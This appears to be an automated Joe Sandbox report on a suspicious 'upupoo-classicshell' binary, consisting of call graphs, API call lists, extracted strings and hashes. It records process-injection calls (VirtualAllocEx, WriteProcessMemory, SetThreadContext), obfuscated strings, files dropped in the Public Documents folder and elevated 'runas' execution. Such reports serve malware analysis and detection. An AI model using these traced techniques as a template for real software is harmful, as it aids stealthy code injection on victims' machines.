GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 28671->28692 28674 6e0a89d8 28676 6e0a8895 ___DestructExceptionObject 28675->28676 28677 6e0a88ab dllmain_raw 28676->28677 28678 6e0a88a6 28676->28678 28679 6e0a8980 ___DestructExceptionObject 28677->28679 28680 6e0a88c5 dllmain_crt_dispatch 28677->28680 28681 6e0a88e7 28678->28681 28693 6e0ab1be 12 API calls 2 library calls 28678->28693 28679->28674 28680->28678 28680->28679 28694 6e0a7cd4 28681->28694 28685 6e0a891e 28686 6e0a8931 28685->28686 28712 6e0ab25a 12 API calls 2 library calls 28685->28712 28686->28679 28689 6e0a893b dllmain_crt_dispatch 28686->28689 28687 6e0a7cd4 __DllMainCRTStartup@12 59 API calls 28690 6e0a890a dllmain_crt_dispatch dllmain_raw 28687->28690 28689->28679 28691 6e0a894e dllmain_raw 28689->28691 28690->28685 28691->28679 28692->28670 28693->28681 28695 6e0a7cf6 28694->28695 28696 6e0a8143 28694->28696 28713 6e0a783d LoadLibraryW LoadLibraryW 28695->28713 28697 6e0a8161 TranslatorGuardHandler 5 API calls 28696->28697 28699 6e0a8158 28697->28699 28699->28685 28699->28687 28701 6e0a7d03 LoadLibraryW LoadLibraryW 28702 6e0a7ddb 28701->28702 28703 6e0a7f30 28701->28703 28702->28703 28704 6e0a7de3 6 API calls 28702->28704 28730 6e0a7ada 28703->28730 28704->28703 28707 6e0a7ada __DllMainCRTStartup@12 32 API calls 28708 6e0a8131 28707->28708 28709 6e0a7ada __DllMainCRTStartup@12 32 API calls 28708->28709 28710 6e0a813b 28709->28710 28745 6e0a74ca 28710->28745 28712->28686 28714 6e0a7ab8 28713->28714 28715 6e0a7977 28713->28715 28718 6e0a7abf 28714->28718 28719 6e0a7abc FreeLibrary 28714->28719 28716 6e0a797f GetProcAddress GetProcAddress GetProcAddress 28715->28716 28717 6e0a7ab5 FreeLibrary 28715->28717 28720 6e0a7aaa FreeLibrary 28716->28720 28721 6e0a79b8 28716->28721 28717->28714 28722 6e0a8161 TranslatorGuardHandler 5 API calls 28718->28722 28719->28718 28720->28719 28721->28720 28724 6e0a79c8 28721->28724 28723 6e0a7ad3 28722->28723 28723->28696 28723->28701 28748 6e0a77f9 28724->28748 28726 6e0a79ed __DllMainCRTStartup@12 28727 6e0a77f9 __DllMainCRTStartup@12 7 API calls 28726->28727 28728 6e0a7a4a __DllMainCRTStartup@12 28727->28728 28729 6e0a7a98 FreeLibrary FreeLibrary 28728->28729 28729->28718 28733 6e0a7b04 28730->28733 28740 6e0a7c6d 28730->28740 28731 6e0a8161 TranslatorGuardHandler 5 API calls 28732 6e0a7ccd 28731->28732 28732->28707 28733->28740 28773 6e0ad10c 28733->28773 28736 6e0a7c2a PathRemoveFileSpecW 28737 6e0ad10c __DllMainCRTStartup@12 26 API calls 28736->28737 28738 6e0a7c4b PathAppendW 28737->28738 28739 6e0a7c5e PathFileExistsW 28738->28739 28738->28740 28739->28740 28741 6e0a7c72 28739->28741 28740->28731 28742 6e0ad10c __DllMainCRTStartup@12 26 API calls 28741->28742 28743 6e0a7c88 PathAppendW 28742->28743 28743->28740 28744 6e0a7c9e MoveFileExW 28743->28744 28744->28740 28785 6e0a7526 28745->28785 28755 6e0a776c 28748->28755 28750 6e0a7818 28759 6e0a9786 28750->28759 28753 6e0a8161 TranslatorGuardHandler 5 API calls 28754 6e0a7839 28753->28754 28754->28726 28756 6e0a7789 __DllMainCRTStartup@12 28755->28756 28758 6e0a778f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 28756->28758 28767 6e0a9679 GetSystemTimeAsFileTime ___crtFlsFree 28756->28767 28758->28750 28768 6e0a973f 28759->28768 28761 6e0a97b1 Sleep 28762 6e0a973f _xtime_get GetSystemTimeAsFileTime 28761->28762 28764 6e0a97a5 __Xtime_diff_to_millis2 28762->28764 28763 6e0a97ea 28765 6e0a8161 TranslatorGuardHandler 5 API calls 28763->28765 28764->28761 28764->28763 28766 6e0a782a 28765->28766 28766->28753 28767->28758 28769 6e0a974e 28768->28769 28771 6e0a975b __aulldvrm 28768->28771 28769->28771 28772 6e0a9679 GetSystemTimeAsFileTime ___crtFlsFree 28769->28772 28771->28764 28772->28771 28774 6e0ad119 28773->28774 28775 6e0ad127 28773->28775 28774->28775 28779 6e0ad140 28774->28779 28782 6e0b1251 20 API calls _abort 28775->28782 28777 6e0ad131 28783 6e0b1195 26 API calls ___std_exception_copy 28777->28783 28780 6e0a7c0c GetModuleFileNameW 28779->28780 28784 6e0b1251 20 API calls _abort 28779->28784 28780->28736 28780->28740 28782->28777 28783->28780 28784->28777 28805 6e0a81cc 28785->28805 28787 6e0a7532 CreateFileW 28788 6e0a770c 28787->28788 28789 6e0a7642 GetFileSize 28787->28789 28790 6e0a771c 28788->28790 28792 6e0a7715 CloseHandle 28788->28792 28789->28788 28791 6e0a7654 VirtualAlloc 28789->28791 28813 6e0a8172 5 API calls TranslatorGuardHandler 28790->28813 28791->28788 28793 6e0a7677 ReadFile 28791->28793 28792->28790 28794 6e0a768a 28793->28794 28795 6e0a7700 28793->28795 28806 6e0a7467 28794->28806 28797 6e0a73ce __DllMainCRTStartup@12 VirtualFree 28795->28797 28797->28788 28799 6e0a74cf 28799->28696 28800 6e0a76d5 __DllMainCRTStartup@12 28800->28795 28801 6e0a76e2 28800->28801 28810 6e0a73ce 28801->28810 28804 6e0a76f7 CloseHandle 28804->28790 28805->28787 28807 6e0a7491 __DllMainCRTStartup@12 28806->28807 28808 6e0a8161 TranslatorGuardHandler 5 API calls 28807->28808 28809 6e0a74c6 28808->28809 28809->28800 28811 6e0a73e6 28810->28811 28812 6e0a73d5 VirtualFree 28810->28812 28811->28790 28811->28804 28812->28811 28813->28799 28814 6e0a1bbc VirtualAlloc 28815 6e0a6ff7 VirtualProtect 28816 6e0a1b55 GetNativeSystemInfo

                                                                                                              Executed Functions

                                                                                                              Function 00C21CE0 Relevance: 310.8, APIs: 125, Strings: 52, Instructions: 1049windowthreadregistryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: start '%s',?), ref: 00C21D14
                                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,00000000), ref: 00C21D20
                                                                                                                • Part of subcall function 00C22B50: FindResourceW.KERNEL32(00C21D2C,00000001,00000010,6E0A7360,00C21D2C,00000000), ref: 00C22B5A
                                                                                                              • ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C21D86
                                                                                                              • ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000BB9,80000002,Software\UpupooClassic\ClassicShell,00020119), ref: 00C21DE5
                                                                                                              • ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000DF7), ref: 00C21DF3
                                                                                                              • MessageBoxW.USER32(00000000,?,6E0A7360,00000000), ref: 00C21E00
                                                                                                              • _memset.LIBCMT ref: 00C21E3A
                                                                                                              • DoEnvironmentSubstW.SHELL32(?,00000104), ref: 00C21E4F
                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00C21E5D
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C21E77
                                                                                                              • CoInitialize.OLE32(00000000), ref: 00C21E7F
                                                                                                              • ShellExecuteW.SHELL32(00000000,runas,?,-upgrade,00000000,00000001), ref: 00C21E9D
                                                                                                              • CoUninitialize.OLE32 ref: 00C21EA3
                                                                                                              • ?DllGetSettingBool@@YA_NPB_W@Z.CLASSICSTARTMENUDLL(AutoStart,80000002,Software\UpupooClassic\ClassicShell,00020119), ref: 00C21EAE
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: quit - no AutoStart), ref: 00C21EC5
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00C21EDB
                                                                                                              • ?DllGetSettingInt@@YAHPB_W@Z.CLASSICSTARTMENUDLL(AutoStartDelay), ref: 00C21EEB
                                                                                                              • Sleep.KERNEL32(00000000), ref: 00C21EF9
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00C21F08
                                                                                                              • ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C21F10
                                                                                                              • ?DllGetSettingBool@@YA_NPB_W@Z.CLASSICSTARTMENUDLL(AutoStart), ref: 00C21F1B
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: quit - no AutoStart), ref: 00C21F32
                                                                                                              • ?DllGetSettingInt@@YAHPB_W@Z.CLASSICSTARTMENUDLL(AutoStartDelay), ref: 00C21F41
                                                                                                              • Sleep.KERNEL32(00000000), ref: 00C21F4F
                                                                                                              • ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C21F6B
                                                                                                              • RegSetValueExW.ADVAPI32 ref: 00C21FC3
                                                                                                              • _memset.LIBCMT ref: 00C21FEB
                                                                                                              • DoEnvironmentSubstW.SHELL32(?,00000104), ref: 00C22006
                                                                                                              • _memset.LIBCMT ref: 00C2202C
                                                                                                              • DoEnvironmentSubstW.SHELL32(?,00000104), ref: 00C22041
                                                                                                              • _memset.LIBCMT ref: 00C2205A
                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000040), ref: 00C2209A
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00C220AF
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C220B8
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00C220C8
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00C220D3
                                                                                                              • ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000DF8), ref: 00C22100
                                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000400,00000000,?,?,?,?,80000002,Software\UpupooClassic\ClassicShell,00020106), ref: 00C22166
                                                                                                              • ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000BB9,?,?,?,?,80000002,Software\UpupooClassic\ClassicShell,00020106), ref: 00C22176
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 00C2218A
                                                                                                              • ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000BB9), ref: 00C221A0
                                                                                                              • ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000DF9), ref: 00C221AE
                                                                                                              • MessageBoxW.USER32(00000000,?,%windir%\System32\regsvr32.exe,00000040), ref: 00C221BB
                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000010,?,?,?,?,?,?,80000002,Software\UpupooClassic\ClassicShell,00020106), ref: 00C2220E
                                                                                                              • ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C22235
                                                                                                              • CoInitialize.OLE32(00000000), ref: 00C2223C
                                                                                                              • ?DllExecuteNamedCommand@@YA_NPB_W@Z.CLASSICSTARTMENUDLL(?,-0000000A,?,00000064,00C33B44), ref: 00C22262
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C2227F
                                                                                                              • TranslateMessage.USER32(?), ref: 00C22296
                                                                                                              • DispatchMessageW.USER32(?), ref: 00C2229D
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C222A9
                                                                                                              • CoUninitialize.OLE32 ref: 00C222AF
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00C2230C
                                                                                                              • PathAppendW.SHLWAPI(?,?), ref: 00C22322
                                                                                                              • PathAddExtensionW.SHLWAPI(?,.dll), ref: 00C22335
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000022), ref: 00C22346
                                                                                                              • ?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z.CLASSICSTARTMENUDLL(00000000,00000000), ref: 00C2234E
                                                                                                              • ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z.CLASSICSTARTMENUDLL(00000001,ClassicStartMenu.admx,ClassicStartMenu.adml,ClassicStartMenuADMX.txt), ref: 00C2236B
                                                                                                              • ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z.CLASSICSTARTMENUDLL(00000004,ClassicShell.admx,ClassicShell.adml,ClassicShellADMX.txt), ref: 00C2238F
                                                                                                              • ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C222D2
                                                                                                                • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242B6
                                                                                                                • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242DF
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C223B0
                                                                                                              • PathFindFileNameW.SHLWAPI(?), ref: 00C223BE
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C223D1
                                                                                                              • CoInitialize.OLE32(00000000), ref: 00C223F3
                                                                                                              • SHEvaluateSystemCommandTemplate.SHELL32(-0000000E,?,00000000,?), ref: 00C2240D
                                                                                                              • _memset.LIBCMT ref: 00C2246B
                                                                                                              • ShellExecuteExW.SHELL32 ref: 00C22498
                                                                                                              • CoUninitialize.OLE32 ref: 00C2249E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: L@@@String$LoadMessage$Ex@@TraitTraitsWait$CloseInitThread@@_memset$FileSetting$EnvironmentExecuteFile@@HandleInitializeModuleNamePathSubstUninitialize$Admx@@Bool@@Component@@CurrentD11@DirectoryFindInt@@PeekProcessSaveSettingsShellSleep_wcschr$AppendAttributesCodeCommandCommand@@CreateDispatchE__@@EvaluateExitExtensionFormatLibraryNamedObjectResourceResources@@SingleSystemTemplateTranslateTranslationValue
                                                                                                              • String ID: $%s%s$%windir%\System32\StartMenuHelper32.dll$%windir%\System32\regsvr32.exe$-autorun$-backup $-cmd $-exit$-nohook$-open$-reloadsettings$-runas$-saveadmx $-settings$-startup$-toggle$-togglenew$-upgrade$-xml $.dll$<$AutoStart$AutoStartDelay$ChangeWindowMessageFilterEx$ClassicShell.adml$ClassicShell.admx$ClassicShellADMX.txt$ClassicStartMenu.CStartHookWindow$ClassicStartMenu.Mutex.%s.%s$ClassicStartMenu.StartMenuMsg$ClassicStartMenu.adml$ClassicStartMenu.admx$ClassicStartMenuADMX.txt$Default$PDGu$Progman$Shell_TrayWnd$Software\UpupooClassic\ClassicShell$Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt$StartHookWindow$StartMenu: end message loop$StartMenu: exit (mutex exists)$StartMenu: mutex %s$StartMenu: quit - no AutoStart$StartMenu: start '%s'$StartMenu: start message loop$TaskbarCreated$Tsn$WinVersion$regsvr32 /s "%windir%\System32\StartMenuHelper32.dll"$runas$user32.dll
                                                                                                              • API String ID: 1283653776-1899632792
                                                                                                              • Opcode ID: df57b9e7ebdffe23ef71a33d1d889cc6eb3df0fce48b82a89558d96f11db8e50
                                                                                                              • Instruction ID: 2573635bffa96d83d6d79540cff73fb455827e508053473a4f11a810b7e00150
                                                                                                              • Opcode Fuzzy Hash: df57b9e7ebdffe23ef71a33d1d889cc6eb3df0fce48b82a89558d96f11db8e50
                                                                                                              • Instruction Fuzzy Hash: 2E721471654390BBD320DB64EC4AF9F77A8AF84B01F044918FA45A71D1DBB5EB04CBA2
                                                                                                              Function 6E0A97F9 Relevance: 147.2, APIs: 42, Strings: 42, Instructions: 223libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6E0A9817
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,invalid random_device value), ref: 6E0A9823
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6E0A9831
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6E0A9848
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6E0A985F
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6E0A9876
                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6E0A988D
                                                                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 6E0A98A4
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6E0A98BB
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 6E0A98D2
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6E0A98E9
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6E0A9900
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6E0A9917
                                                                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6E0A992E
                                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6E0A9945
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6E0A995C
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6E0A9973
                                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6E0A998A
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6E0A99A1
                                                                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6E0A99B8
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6E0A99CF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModuleXinvalid_argumentstd::_
                                                                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$invalid random_device value$kernel32.dll
                                                                                                              • API String ID: 2259925219-2420364413
                                                                                                              • Opcode ID: 1f353f6b2f3d93471452ddd0dd91daf40301053ab154346b8aac203eb3f02b63
                                                                                                              • Instruction ID: 3aa6410400ac3f02b8326eb916f20d0734eefa6724fe69c96ca409f03710f30e
                                                                                                              • Opcode Fuzzy Hash: 1f353f6b2f3d93471452ddd0dd91daf40301053ab154346b8aac203eb3f02b63
                                                                                                              • Instruction Fuzzy Hash: DA911D71821A15EBCF20AFF4C8DCAA67BE8FF0F6053855416F219DA244D7BAA1118F64
                                                                                                              Function 10002DC0 Relevance: 7.6, APIs: 5, Instructions: 84threadmemoryinjectionCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007,?,?,?), ref: 10002E0A
                                                                                                              • VirtualAllocEx.KERNELBASE(?,00000000,0000098B,00003000,00000040,?,?,?,?), ref: 10002E34
                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,0000098B,?,?,?,?), ref: 10002E51
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00010007,?,?,?), ref: 10002E69
                                                                                                              • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?), ref: 10002E7C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadVirtualWow64$AllocFreeMemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3959752867-0
                                                                                                              • Opcode ID: 2aa5b0fbbeca8468b766af85c47c793cb346d04a068a50436ebb2147043037f6
                                                                                                              • Instruction ID: 28f3b55be30508669fb9009672a420b800c3ec54d15fb3acdede59701e9519d4
                                                                                                              • Opcode Fuzzy Hash: 2aa5b0fbbeca8468b766af85c47c793cb346d04a068a50436ebb2147043037f6
                                                                                                              • Instruction Fuzzy Hash: 8E21C835B40218ABF720DB65DC89FEF77ECEB49690F1040AAF909E6181DA709E449B90
                                                                                                              Function 10001270 Relevance: 224.7, APIs: 2, Strings: 126, Instructions: 749COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 234 10001270-100012a6 call 1000db40 237 10002bd7 234->237 238 100012ac-10002a5b 234->238 239 10002bdc-10002bf7 call 10003ae3 237->239 240 10002a60-10002a63 238->240 242 10002a72-10002ac1 call 100035b0 call 10002c90 240->242 243 10002a65-10002a70 240->243 242->239 249 10002ac7-10002b87 call 10002c00 call 10002f00 * 3 call 10003660 call 10003b27 242->249 243->240 243->242 262 10002b89-10002b8f 249->262 263 10002bcc-10002bd2 call 10002f60 249->263 264 10002b90-10002b94 262->264 263->237 266 10002b96-10002b98 264->266 267 10002b9a 264->267 268 10002b9c-10002ba6 GetFileAttributesW 266->268 267->268 269 10002bc5-10002bca 268->269 270 10002ba8-10002bb0 268->270 269->263 269->264 270->269 271 10002bb2-10002bb9 270->271 272 10002bbb-10002bbd 271->272 273 10002bbf 271->273 274 10002bc1-10002bc3 SetFileAttributesW 272->274 273->274 274->269
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,?,00000018,00000003,10002EC0,?,?,?,C:\Users\Public\Documents\upup.ox,C:\Users\Public\Documents\ClassicStartMenuDLL.dll,C:\Users\Public\Documents\upupoo-classicshell.exe), ref: 10002B9D
                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,00000000), ref: 10002BC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID: Y$a$Ya$Z:$_Y$c$c$9$9$9$cc$ca$}}$$I/$'0$'8$'9$'9$'=$'>$'>$'?$-u1Q$0)$0:$0'88$11$13$13$1<$1u$1ak=$38$38$38$3:$3a$3e$3e$3k$3m$3s$8'$8'$83$83$83$88$8?'8$93$93$93$93$:;$:f$:}$:0'8$;'$;'$;3$;8$;9$;f$;y$;}$;'mo$<8$<1=$=3$=>';$>=$>';:$?8$??$??$?'8<$C:\Users\Public\Documents\ClassicStartMenuDLL.dll$C:\Users\Public\Documents\upup.ox$C:\Users\Public\Documents\upupoo-classicshell.exe$I-$Ia9$Ia9$JQcm$M-1$M-Ma$M-aa$U--}$U--}$Uyt$X__Y$Y"$az$a=/[$bu$dh{b$ee$ej$fu$jfml$ku$ku$mk$mu$mu$ou$sk$tWq$u1$u1$u8$u8$u8$u9$u9$u9$u9$u9$u:$ucI_$yc$yu$yu$}u$}meo$!_c$f
                                                                                                              • API String ID: 3188754299-3950023959
                                                                                                              • Opcode ID: cedff1b7464d14d8e85796f7a096d0861772e959dedb2aa505a10ea431317878
                                                                                                              • Instruction ID: da75c45dda52581703278f533a2ab6672e5d46496c56aec32b46b385a787f13b
                                                                                                              • Opcode Fuzzy Hash: cedff1b7464d14d8e85796f7a096d0861772e959dedb2aa505a10ea431317878
                                                                                                              • Instruction Fuzzy Hash: DEC2BBB0846769CFEB60CF469D4839EBAB1FB11348F6081C9C59C3A215DB751ACACF85
                                                                                                              Function 6E0A783D Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 180libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32 ref: 6E0A795C
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 6E0A7965
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A798B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A799A
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A79A4
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7AB1
                                                                                                                • Part of subcall function 6E0A77F9: __Thrd_sleep.LIBCPMT ref: 6E0A7825
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7A9F
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7AA2
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7AB6
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7ABD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
